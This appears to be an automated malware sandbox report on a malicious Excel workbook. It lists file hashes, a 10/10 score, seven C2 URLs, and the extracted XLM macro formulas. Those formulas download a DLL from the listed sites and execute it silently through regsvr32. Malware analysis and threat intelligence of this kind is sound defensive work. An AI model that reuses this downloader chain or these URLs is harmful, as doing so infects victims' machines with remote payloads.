General

  • Target

    c05fc0a3bc5d6f17aa4993862d18fefc210b6c6e46ea07e6f2645e5056e50c2e

  • Size

    46KB

  • MD5

    becb7a238516b57164e3aa3eefdcecbf

  • SHA1

    aabdfc17de5e1b94a2f2c523f3e7122897bb2fee

  • SHA256

    c05fc0a3bc5d6f17aa4993862d18fefc210b6c6e46ea07e6f2645e5056e50c2e

  • SHA512

    cdc8fd1eb39d47d19e0ce86f0c074f73f100ad2639e21579aae1ecb2108bd6def16bf850eb5b55a5017b37c9e1071061b3ea975065512b6260c91d415f0c2f98

  • SSDEEP

    768:mCra70og13bQiBpFViBYYg8z/cZ2IQYRAvYUbTUPMr7nIIbwPvvfOa6rw7M39vdY:zraQog5bz3iBC8z/XYCpK60Ibwv3OHsL

Score
10/10
xlm

Malware Config

Extracted

Rule
Excel 4.0 XLM Macro
C2

http://www.arkpp.com/ARIS-BSU/9K1/

http://www.avrworks.com/mail/0Z4GbaKuDTGprJ/

http://www.babylinesl.com/catalog/iVsl6YvlyIyX/

https://physioacademy.co.uk/blog/Qs8QZTp0Z6nKf9YjVBMS/

https://unada.us/acme-challenge/3NXwcYNCa/

https://automobile-facile.fr/wp-admin/QV/

https://alebit.de/css/gqKtdKmTsC4iDh/

Attributes
  • formulas

    =CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://www.arkpp.com/ARIS-BSU/9K1/","..\fbd.dll",0,0) =IF('EGVEB'!D9<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://www.avrworks.com/mail/0Z4GbaKuDTGprJ/","..\fbd.dll",0,0)) =IF('EGVEB'!D11<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://www.babylinesl.com/catalog/iVsl6YvlyIyX/","..\fbd.dll",0,0)) =IF('EGVEB'!D13<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://physioacademy.co.uk/blog/Qs8QZTp0Z6nKf9YjVBMS/","..\fbd.dll",0,0)) =IF('EGVEB'!D15<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://unada.us/acme-challenge/3NXwcYNCa/","..\fbd.dll",0,0)) =IF('EGVEB'!D17<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://automobile-facile.fr/wp-admin/QV/","..\fbd.dll",0,0)) =IF('EGVEB'!D19<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://alebit.de/css/gqKtdKmTsC4iDh/","..\fbd.dll",0,0)) =IF('EGVEB'!D21<0,CLOSE(0),) =EXEC("C:\Windows\SysWow64\regsvr32.exe -s ..\fbd.dll") =RETURN()

Signatures

Files

  • c05fc0a3bc5d6f17aa4993862d18fefc210b6c6e46ea07e6f2645e5056e50c2e
    .xlsx office2007